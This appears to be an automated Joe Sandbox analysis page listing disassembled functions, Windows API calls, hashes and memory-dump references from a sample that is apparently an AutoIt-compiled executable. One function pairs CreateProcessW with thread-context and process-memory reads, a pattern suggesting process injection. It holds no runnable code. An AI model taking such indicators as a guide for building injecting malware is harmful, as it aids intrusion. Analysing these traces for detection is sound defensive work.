Opcode ID: 1cf513f19f448ca27814594f3bf1e427f740744d6c3b2bbb705af2fc094dd597
Instruction ID: 0ae74033905b9e2fa4bd0e541fbe03325f70c30b2b0208fc52eb0235c8d3f52c
Opcode Fuzzy Hash: 1cf513f19f448ca27814594f3bf1e427f740744d6c3b2bbb705af2fc094dd597
Instruction Fuzzy Hash: 7C81DBB0915A80CFCB86DF7AA84C76DBBE5FB88306750816BE419CB372EB7045858F51

Function 00BD434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BD4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BD4432

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 680efd71abe12ce7c3c04803a2d0a8dc2f7c853ab36610beeeb32fcbdcbd1b4d
Instruction ID: b5a9433a2968e817a7664ec44df0697b68c047494256d47cbbabaeaba7015957
Opcode Fuzzy Hash: 680efd71abe12ce7c3c04803a2d0a8dc2f7c853ab36610beeeb32fcbdcbd1b4d
Instruction Fuzzy Hash: A6317CB0505B019FC721DF64D88479BFBE8FB48319F00096FE69A92351E770A944CB96

Function 00BF571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00BF5733

Part of subcall function 00BFA16B: __NMSG_WRITE.LIBCMT ref: 00BFA192
Part of subcall function 00BFA16B: __NMSG_WRITE.LIBCMT ref: 00BFA19C

__NMSG_WRITE.LIBCMT ref: 00BF573A

Part of subcall function 00BFA1C8: GetModuleFileNameW.KERNEL32(00000000,00C933BA,00000104,?,00000001,00000000), ref: 00BFA25A
Part of subcall function 00BFA1C8: ___crtMessageBoxW.LIBCMT ref: 00BFA308

Part of subcall function 00BF309F: ___crtCorExitProcess.LIBCMT ref: 00BF30A5
Part of subcall function 00BF309F: ExitProcess.KERNEL32 ref: 00BF30AE

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

RtlAllocateHeap.NTDLL(017D0000,00000000,00000001,00000000,?,?,?,00BF0DD3,?), ref: 00BF575F

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 17f19b2a7139448415e2a5e84a1d68953791237247c60801f7ad8f03743ff0d0
Instruction ID: f6a487af1317c14f0cc685bf4b4c9dfa75b26cb8880dc7bd1b1c6426ae1f1f8a
Opcode Fuzzy Hash: 17f19b2a7139448415e2a5e84a1d68953791237247c60801f7ad8f03743ff0d0
Instruction Fuzzy Hash: B601F535300B0DDAD6253734EC82B7E73C8CB42762F1100A6F715AB182DF709D094760

Function 00C398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C39548,?,?,?,?,?,00000004), ref: 00C398BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C39548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C398D1
CloseHandle.KERNEL32(00000000,?,00C39548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C398D8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 15a4db3b29458e1b6d6a84a8f0944acc49832aefb4a723dd71fe2c7493c255e0
Instruction ID: c68521671532b904ac1dbb83d78cfb8219650da9d398de348bec2f8a8b605908
Opcode Fuzzy Hash: 15a4db3b29458e1b6d6a84a8f0944acc49832aefb4a723dd71fe2c7493c255e0
Instruction Fuzzy Hash: 78E08636141714B7EB212B54EC09FDE7B19EB06761F104124FB24B90F087B116529798

Function 00BDA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C0FC01

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: ad40438f9d142d3d0c9493a1721e93a6a7d92d88bb20448a62982067c20c5831
Instruction ID: ba097d82b5f1a020cd7ec9a0a3510fd80eae546c9e665b731939bfe482bceb19
Opcode Fuzzy Hash: ad40438f9d142d3d0c9493a1721e93a6a7d92d88bb20448a62982067c20c5831
Instruction Fuzzy Hash: C7225870508201DFDB24DF14C494A6AFBE1FF45304F1589AEE89A8B362E731ED85DB82

Function 00BD4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD4CBA

Strings

EA06, xrefs: 00C0D8CC

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: cdf4d9d82e3edef5d01419b768785900a13869f9fa1afea96003231f89dbffa8
Instruction ID: 0c9456cadef4c1061c71b7820807e20d73055fbaa9d80761bcc5ccc66b6c553f
Opcode Fuzzy Hash: cdf4d9d82e3edef5d01419b768785900a13869f9fa1afea96003231f89dbffa8
Instruction Fuzzy Hash: 84412821A042586BDF259B6488917BEFBE3DB45300F6844F7E9869B382F7309D4483A1

Function 00C377B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C378DB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
Instruction ID: 5e1e61c514967ccb2999f1ac5b3193081b913e50c631af8d26a6a630f6f51b78
Opcode Fuzzy Hash: 059574cf47bda8725b60555c6bc87727ac0702e8c5106250e102d0fb1eb030cd
Instruction Fuzzy Hash: F74129B19282099FCB20FFA8D8859BAF7E4EF09300F244699E255A7382DF359D04D761

Function 00BD7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD7AAB
_memmove.LIBCMT ref: 00BD7B16

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction ID: 7d1f6227b684530995126030bd0e0ba5bcc01b0a073cb083daff98da78a6df7c
Opcode Fuzzy Hash: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction Fuzzy Hash: AC314EB5644606ABC704DF68C8D1DA9F3E9FF48320715866AE919CB391FB30E954CB90

Function 00BD47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00BD4834

Part of subcall function 00BF336C: __lock.LIBCMT ref: 00BF3372
Part of subcall function 00BF336C: DecodePointer.KERNEL32(00000001,?,00BD4849,00C27C74), ref: 00BF337E
Part of subcall function 00BF336C: EncodePointer.KERNEL32(?,?,00BD4849,00C27C74), ref: 00BF3389

Part of subcall function 00BD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BD4915
Part of subcall function 00BD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BD492A

Part of subcall function 00BD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BD3B68
Part of subcall function 00BD3B3A: IsDebuggerPresent.KERNEL32 ref: 00BD3B7A
Part of subcall function 00BD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C952F8,00C952E0,?,?), ref: 00BD3BEB
Part of subcall function 00BD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00BD3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BD4874

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 1cb49bf465d5ee879aa55dfd6e5110d54ee0f8a9c0e77421c446ee40b8e4dd48
Instruction ID: 1460dbddd2a8fb2f7365dfeab4b653e090b5f900223e300f078cbb84ee4c621f
Opcode Fuzzy Hash: 1cb49bf465d5ee879aa55dfd6e5110d54ee0f8a9c0e77421c446ee40b8e4dd48
Instruction Fuzzy Hash: 9B118C719087459FC700EF69E849A0EFBE8EB89B90F10455FF040932B1EB719549CB92

Function 00BF0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BF571C: __FF_MSGBANNER.LIBCMT ref: 00BF5733
Part of subcall function 00BF571C: __NMSG_WRITE.LIBCMT ref: 00BF573A
Part of subcall function 00BF571C: RtlAllocateHeap.NTDLL(017D0000,00000000,00000001,00000000,?,?,?,00BF0DD3,?), ref: 00BF575F

std::exception::exception.LIBCMT ref: 00BF0DEC
__CxxThrowException@8.LIBCMT ref: 00BF0E01

Part of subcall function 00BF859B: RaiseException.KERNEL32(?,?,?,00C89E78,00000000,?,?,?,?,00BF0E06,?,00C89E78,?,00000001), ref: 00BF85F0

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 3765e8501023e95b994215d73c6837fee0be86eba6d41db91c4771a78acab1d2
Instruction ID: de19079e240b045e045e9f7f43313c22489b49b86bc3db6e1d35e4fde6ba69a1
Opcode Fuzzy Hash: 3765e8501023e95b994215d73c6837fee0be86eba6d41db91c4771a78acab1d2
Instruction Fuzzy Hash: A1F0F47580021E66CF20BA94EC419FEBBECDF01350F1004A5FF0497692DF709A48D2D1

Function 00BF53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

__lock_file.LIBCMT ref: 00BF53EB

Part of subcall function 00BF6C11: __lock.LIBCMT ref: 00BF6C34

__fclose_nolock.LIBCMT ref: 00BF53F6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7941bb8666275624548f0b48c5fd38980a9d37e8a4316e3cb23a357f0d2a05df
Instruction ID: 290dd6af19655efe03742b700dfde2d1d6d8790cf8a8b4e317bad629037cebe2
Opcode Fuzzy Hash: 7941bb8666275624548f0b48c5fd38980a9d37e8a4316e3cb23a357f0d2a05df
Instruction Fuzzy Hash: 6EF09671900A0C9ADB216B799C027BD67E06F41374F208199A765AB1C1CBFC49495B55

Function 0181A6AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0181AE6B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0181AF01
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0181AF23

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: aaf3e44322954a9a1eaa455e637a7a5e0fe06152656218746e6115a44f407e02
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 2B12DE24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 00BF0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00BF0CB7

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1cf5de009b60e97004512282f9a13d683913fc6eb9a93dd0c873a5fc5d67787b
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9431E2B4A101099BC718EF08C4C4A69FBE6FB59300B2486E5E90ACB366D631EDC5DB80

Function 00C0FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C0FCB7

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: af7f0dba284677d5fb6428e7f28779e78c9827767bab7615570099765d9e04a0
Instruction ID: 13386833a5776b6895392d09a94f0bb22746f107c071cacc82f93c375140d0a7
Opcode Fuzzy Hash: af7f0dba284677d5fb6428e7f28779e78c9827767bab7615570099765d9e04a0
Instruction Fuzzy Hash: 56411674904341DFDB24DF24C494B1AFBE1BF49318F0988ADE8998B762D731E885CB52

Function 00BD7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD7BB3

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 68343c1a463cdbd05fc1dc2c005183b3a7b85224fb26e315e6a35070093e1f76
Instruction ID: 43f493c1cd266e43cbbba6f3195affb977564261645be41d3e0cad8411714848
Opcode Fuzzy Hash: 68343c1a463cdbd05fc1dc2c005183b3a7b85224fb26e315e6a35070093e1f76
Instruction Fuzzy Hash: E8212472A44A18EBEB148F25E8417AEBBF4FB14350F2488AEE846C51A0FB3180D0D705

Function 00BD4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00BD4BEF

Part of subcall function 00BF525B: __wfsopen.LIBCMT ref: 00BF5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BD4E0F

Part of subcall function 00BD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00BD4BA4

Part of subcall function 00BD4C70: _memmove.LIBCMT ref: 00BD4CBA

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 6c983060c7f9bfa190ff10e26d9ffe5a474d17da226363ac00db9210271351d6
Instruction ID: 6f1cd3d16d59218cf7c120288d02b20d59c5f799e63390d654a3f82b4ea70abd
Opcode Fuzzy Hash: 6c983060c7f9bfa190ff10e26d9ffe5a474d17da226363ac00db9210271351d6
Instruction Fuzzy Hash: 4C119431600206BBCF15AFB0C856FADB7E5AF44710F10886AF556AB2C1FB719A059751

Function 00C0FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C0FD91

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e496f034ae1d9589f6b511356d5dc6b494e2b70cc53e92d9b895d71a5d334be
Instruction ID: 707c02062ee2e4996be72c6a95af09bc2e924af843655cd933e4aed00ce00b5a
Opcode Fuzzy Hash: 1e496f034ae1d9589f6b511356d5dc6b494e2b70cc53e92d9b895d71a5d334be
Instruction Fuzzy Hash: B4214674908301DFCB14DF24C444B1ABBE1BF88314F0589ACF98957722D731E849CB92

Function 00BF4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00BF48A6

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 310e931b1a071e748788957f0f7653d9cf77ed09c7de595049e6c56d48ebbd53
Instruction ID: 1d2d7739db98b73a22daa7778d48e41083d00ca131bce0d6ed7b21558b453b3f
Opcode Fuzzy Hash: 310e931b1a071e748788957f0f7653d9cf77ed09c7de595049e6c56d48ebbd53
Instruction Fuzzy Hash: DBF0223190020CEBDF11AFB48C063BF37E0EF01364F048494F6249B191CBB88959DB51

Function 00BD4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00C952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BD4E7E

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1ec85294fe9484035587f58a28ddf77dd1814fbbdeb6d8fc8e078e6f4855207f
Instruction ID: 60cea1915223e7e56be226e7ff6a9efe5a53496873262e7b09726ab93d291ce0
Opcode Fuzzy Hash: 1ec85294fe9484035587f58a28ddf77dd1814fbbdeb6d8fc8e078e6f4855207f
